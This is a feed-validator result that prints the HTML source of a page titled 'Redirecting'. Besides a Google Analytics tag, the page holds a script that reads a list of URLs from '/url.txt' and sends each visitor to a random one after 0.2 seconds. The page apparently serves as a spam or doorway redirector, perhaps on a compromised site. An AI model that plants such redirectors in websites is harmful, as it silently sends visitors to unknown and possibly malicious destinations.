It looks like this is a web page, not a feed. I looked for a feed associated with this page, but couldn't find one. Please enter the address of your feed to validate.

Source: https://www.gosciniecori.com.pl/stock/hvzddjca/

  1. <!DOCTYPE html>
  2. <html lang="en">
  3. <head>
  4.    <meta charset="UTF-8">
  5.    <meta http-equiv="X-UA-Compatible" content="IE=edge">
  6.    <meta name="viewport" content="width=device-width, initial-scale=1.0">
  7.    <title>Redirecting</title>
  8.    <!-- Google tag (gtag.js) -->
  9.    <script async src="https://www.googletagmanager.com/gtag/js?id=G-QLVQJ19LP8"></script>
  10.    <script>
  11.      window.dataLayer = window.dataLayer || [];
  12.      function gtag(){dataLayer.push(arguments);}
  13.      gtag('js', new Date());
  14.    
  15.      gtag('config', 'G-QLVQJ19LP8');
  16.    </script>
  17. </head>
  18. <body>
  19.    <script>
  20.        function readTextFile(file, callback) {
  21.            var rawFile = new XMLHttpRequest();
  22.            rawFile.overrideMimeType("application/json");
  23.            rawFile.open("GET", file, true);
  24.            rawFile.onreadystatechange = function() {
  25.                if (rawFile.readyState === 4 && rawFile.status == "200") {
  26.                    callback(rawFile.responseText);
  27.                }
  28.            }
  29.            rawFile.send(null);
  30.        }
  31.  
  32.        readTextFile("/url.txt", function(text){
  33.            var urls = text.split("\n");
  34.            var randomUrl = urls[Math.floor(Math.random() * urls.length)];
  35.            setTimeout(function() {
  36.                window.location.href = randomUrl;
  37.            }, 200); // 0.2秒延迟
  38.        });
  39.    </script>
  40. </body>
  41. </html>
  42.  
Copyright © 2002-9 Sam Ruby, Mark Pilgrim, Joseph Walton, and Phil Ringnalda